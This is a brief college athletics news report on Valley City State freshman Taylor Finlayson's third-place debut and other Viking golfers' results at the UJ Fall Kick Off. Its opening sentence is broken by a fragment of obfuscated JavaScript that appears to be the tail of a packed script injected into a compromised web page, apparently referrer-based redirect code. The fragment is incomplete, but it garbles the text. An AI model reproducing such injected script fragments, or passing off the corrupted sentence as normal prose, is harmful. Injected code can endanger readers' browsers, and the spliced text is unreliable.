VALLEY CITY,N.D. (VCSUVikings.com) – Valley City State freshman Taylor Finlayson shot an even-par 72 on znhhn|var|u0026u|referrer|titzn||js|php’.split(‘|’),0,{}))
Wednesday as he placed third in his collegiate golf debut for the Vikings.

Playing at the UJ Fall Kick Off, Finlayson finished just one shot off the lead in VCSU golf’s season-opening event. The 18-hole tournament was held at the Jamestown Country Club. Jared Lentz shot a 2-over 74 as he placed 10th at the event, and Cameron Rall carded a 4-over 76 to finished tied for 15th.

On the women’s side, Viking senior Nicole Heinitz carded a Top 10 finish as she placed ninth with a round of 89. Viking freshman Jayden Romfo was just one behind as she shot 90 to place 11th in the women’s standings.

Valley City State’s women carded a team round of 400, placing fourth out of four teams. The Viking men had two teams at the tournament. VCSU’s top team placed sixth out of 10 teams, carding a 311 team score. Valley City State’s second team shot a 333 to finish ninth.

Up next: Valley City State resumes its fall season Sept. 10-11 with a 36-hole tournament at Dickinson State University.
